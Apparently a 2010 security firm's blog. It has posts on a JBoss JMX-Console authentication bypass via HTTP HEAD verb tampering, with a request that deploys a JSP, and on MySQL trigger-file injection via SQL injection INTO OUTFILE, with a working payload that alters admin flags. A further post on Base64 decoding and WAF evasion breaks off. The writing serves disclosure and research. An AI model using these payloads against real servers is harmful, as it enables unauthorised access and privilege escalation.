Friday, April 30, 2010

Authentication bypass vulnerabilities are always interesting from a penetration tester point of view, because the 80% of the time are very simple to abuse. The impact of a security bypass vulnerability depends, from a technical perspective, on what you could be able to do when you are authenticated.

Jboss has some good management tools that are used to deploy new applications and to perform privileged actions like executing scripts on the remote host. One of these is Jboss JMX-Console.

For more information on what an attacker may accomplish through the JMX-Console I suggest to read the following presentation:

From the configuration above, security restrictions are enabled only for “GET” and “POST” methods. Any other HTTP method supported by the server will be not restricted.

By issuing a request with the “HEAD” method is possible to invoke directly, with “JBossAdmin” privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed.

This kind of attack is referred in Appsec literature as Verb Tampering. The following one is a very good paper on this topic.

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1

Wednesday, April 21, 2010

Security experts know that is possible to inject stacked queries on Microsoft SQL Server, when dealing with SQL Injections but not on other DBMS.

In the next few lines we'll describe a new technique that could allow an attackerto insert or update data also when there is a SQL Injection on select queries.The most known attack also implemented on SQLMap is the takeover technique when the MySQL user has File Privileges and the DBMS is on the same server of the exposed web application.What to do when the DBMS host is on a different server?

Something can be done by abusing Triggers.MySQL supports Triggers since 5.0.2.In MySQL, Triggers are wrote as a separate file on the same directory ofthe Database data dir.It needs two files:

/mysql/datadir/DB/TableName.TRG

/mysql/datadir/DB/TriggerName.TRN

Suppose now that a `user` table exists on users DB.So run mysql client and create the following trigger:

We can see that two files were created in data directory of users DB:/var/lib/mysql/users/atk.TRN

TYPE=TRIGGERNAMEtrigger_table=user

and /var/lib/mysql/users/user.TRG

TYPE=TRIGGERStriggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nupdate user set isadmin=1 where isadmin=0;\nend'sql_modes=0definers='root@localhost'client_cs_names='latin1'connection_cl_names='latin1_swedish_ci'db_cl_names='latin1_swedish_ci'

What happens if we successfully write user.TRG and atk.TRN in/var/lib/mysql/users/users.TRG using INTO OUTFILE ?

AND 1=0 union select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATEDEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 whereisadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

Then do the same to create atk.TRN

TYPE=TRIGGERNAME trigger_table=user

MySQL will check if a TRG extension is present and will execute thetrigger.So, in this scenery, after a user registration every user will be an admin... and Stored Xss like Frame Injection could be accomplished as well.Also some privilege escalation could probably be done since the DEFINER keyword says to MySQL the user on behalf the trigger should be executed.

Another interesting thing about this attack is that we can try fuzzing

tabname.MYD

tabname.MYI

tabname.frm

and of course

tabname.TRG

triggername.TRN

file format and try to exploit the file format parsers.We found some crash on TRG which doesn't seem to be exploitable, but who knows..further research could result in exploitable parser errors on those file formats.

When dealing with Web Application Firewall, IDSs or application filters trying to block attacks there are always two big problem:

Completeness

Correctness

We know Regexp could be faulty, but let's suppose there's some sort of encoding in the payload which is furtherly decoded on some server side layer and then used in clear text to pass it to another layer.A good defense should be to let the WAF/Filter decode it and check for attack patterns (using regexp..).Now the question is how can I implement a decoder to get the input back in clear?Let's talk about Base64.

Base64 encoding and decoding are implemented in many ways and many languages.For example PHP base64_decode() is:

Very greedy.

Goes ahead even if something goes wrong

Even some Java Implementation is kind of greedy:com.sun.org.apache.xerces.internal.impl.dv.util.Base64

About Minded Security

Minded Security
is the Software Security Company that supports you to build, deliver and use more secure software. Minded Security helps businesses and organizations to build secure products and services.